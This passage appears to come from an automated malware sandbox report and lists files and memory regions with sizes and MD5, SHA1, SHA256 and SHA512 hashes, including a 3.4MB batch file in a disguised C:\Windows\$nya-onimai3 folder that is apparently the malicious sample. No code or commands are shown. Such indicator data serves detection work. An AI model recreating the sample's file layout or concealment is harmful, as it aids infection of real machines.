                                                                                                                              C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:3248

                                                                                                                              Network

                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                Filesize

                                                                                                                                3KB

                                                                                                                                MD5

                                                                                                                                3f01549ee3e4c18244797530b588dad9

                                                                                                                                SHA1

                                                                                                                                3e87863fc06995fe4b741357c68931221d6cc0b9

                                                                                                                                SHA256

                                                                                                                                36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

                                                                                                                                SHA512

                                                                                                                                73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                Filesize

                                                                                                                                2KB

                                                                                                                                MD5

                                                                                                                                402c3f48af4b254fd33c130f0639e312

                                                                                                                                SHA1

                                                                                                                                f0668e6a1cfb84b7ad056762299e68ebf5ec2aa7

                                                                                                                                SHA256

                                                                                                                                39c278989a230bf0f6f6082149afb2790675e1774b275ca4f60b34c85b88a1c2

                                                                                                                                SHA512

                                                                                                                                d05ff520e0407fb54ecbefd963f7c2764435742f9162140ff6f4a62ffe9ea3f991183f90c42f71f3531685b34457c7bf6776b923fb74d3da3432736fedddaefb

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lglvmhld.pvo.ps1

                                                                                                                                Filesize

                                                                                                                                60B

                                                                                                                                MD5

                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                SHA1

                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                SHA256

                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                SHA512

                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                              • C:\Windows\$nya-onimai3\$nya-Loli.bat

                                                                                                                                Filesize

                                                                                                                                3.4MB

                                                                                                                                MD5

                                                                                                                                f06fd82f34a91ec7ec3a2f242daa5699

                                                                                                                                SHA1

                                                                                                                                31625c87b890569ab23b1556d37400deefbbe03c

                                                                                                                                SHA256

                                                                                                                                3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b

                                                                                                                                SHA512

                                                                                                                                31b7e30d6d3194eb83619b8006d38a87e4cb807aadc284f1c4acc5c03f701a154bad50a13a730b211443f9730c46e15b13c00f4b3994b53261efc17fd685b50a

                                                                                                                              • memory/64-123-0x00000208072C0000-0x00000208072EA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/616-90-0x000002794D3D0000-0x000002794D3FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/616-79-0x000002794D330000-0x000002794D354000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                144KB

                                                                                                                              • memory/616-91-0x00007FFF8C110000-0x00007FFF8C120000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/616-89-0x000002794D3D0000-0x000002794D3FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/616-81-0x000002794D3D0000-0x000002794D3FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/616-80-0x000002794D3D0000-0x000002794D3FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/616-88-0x000002794D3D0000-0x000002794D3FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/616-87-0x000002794D3D0000-0x000002794D3FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/616-86-0x000002794D3D0000-0x000002794D3FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/672-45-0x000001FFC1A30000-0x000001FFC1F98000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                5.4MB

                                                                                                                              • memory/672-46-0x000001FFC26B0000-0x000001FFC2700000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                320KB

                                                                                                                              • memory/672-47-0x000001FFC27C0000-0x000001FFC2872000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                712KB

                                                                                                                              • memory/672-48-0x000001FFC2FA0000-0x000001FFC3162000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                1.8MB

                                                                                                                              • memory/672-62-0x000001FFC36A0000-0x000001FFC3BC8000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                5.2MB

                                                                                                                              • memory/676-105-0x00007FFF8C110000-0x00007FFF8C120000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/676-95-0x000001F7941A0000-0x000001F7941CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/676-100-0x000001F7941A0000-0x000001F7941CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/676-101-0x000001F7941A0000-0x000001F7941CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/676-102-0x000001F7941A0000-0x000001F7941CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/676-103-0x000001F7941A0000-0x000001F7941CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/676-104-0x000001F7941A0000-0x000001F7941CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/960-115-0x000001B7667A0000-0x000001B7667CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/960-109-0x000001B7667A0000-0x000001B7667CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/960-114-0x000001B7667A0000-0x000001B7667CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/960-119-0x00007FFF8C110000-0x00007FFF8C120000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/960-116-0x000001B7667A0000-0x000001B7667CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/960-117-0x000001B7667A0000-0x000001B7667CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/960-118-0x000001B7667A0000-0x000001B7667CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/1776-0-0x00007FFFADC13000-0x00007FFFADC15000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/1776-18-0x00007FFFADC10000-0x00007FFFAE6D1000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/1776-44-0x00007FFFADC10000-0x00007FFFAE6D1000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/1776-17-0x00007FFFADC13000-0x00007FFFADC15000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/1776-16-0x00000254C2A90000-0x00000254C2C94000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/1776-15-0x00000254C2590000-0x00000254C259A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                40KB

                                                                                                                              • memory/1776-14-0x00000254C28D0000-0x00000254C2946000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                472KB

                                                                                                                              • memory/1776-13-0x00000254C2800000-0x00000254C2844000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                272KB

                                                                                                                              • memory/1776-12-0x00007FFFADC10000-0x00007FFFAE6D1000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/1776-11-0x00007FFFADC10000-0x00007FFFAE6D1000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/1776-6-0x00000254C2A60000-0x00000254C2A82000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                136KB

                                                                                                                              • memory/2952-76-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/2952-66-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/2952-73-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/2952-75-0x00007FFFCBBE0000-0x00007FFFCBC9E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                              • memory/2952-74-0x00007FFFCC090000-0x00007FFFCC285000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/2952-67-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/2952-68-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/2952-69-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/3236-64-0x00007FFFCC090000-0x00007FFFCC285000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/3236-65-0x00007FFFCBBE0000-0x00007FFFCBC9E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                              • memory/3236-63-0x000001E882620000-0x000001E88264A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/4296-52-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/4296-50-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/4948-49-0x0000000000FC0000-0x0000000000FE9000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                164KB